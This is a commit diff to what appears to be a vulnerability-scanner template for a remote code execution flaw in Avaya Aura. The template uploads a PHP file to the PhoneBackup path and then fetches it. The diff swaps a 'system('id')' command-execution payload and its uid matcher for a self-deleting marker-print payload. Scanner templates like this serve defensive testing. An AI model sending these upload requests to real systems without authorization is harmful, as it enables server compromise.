Update avaya-aura-rce.yaml
parent
f61c0edc78
commit
67338b772a
|
@ -26,7 +26,7 @@ http:
|
||||||
User-Agent: AVAYA
|
User-Agent: AVAYA
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
<?php system('id');
|
<?php print('avaya-aura-rce');unlink(__FILE__);
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
|
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
|
||||||
|
@ -36,10 +36,10 @@ http:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: word
|
||||||
part: body_2
|
part: body_2
|
||||||
regex:
|
words:
|
||||||
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
|
- "avaya-aura-rce"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header_2
|
part: header_2
|
||||||
|
|
Loading…
Reference in New Issue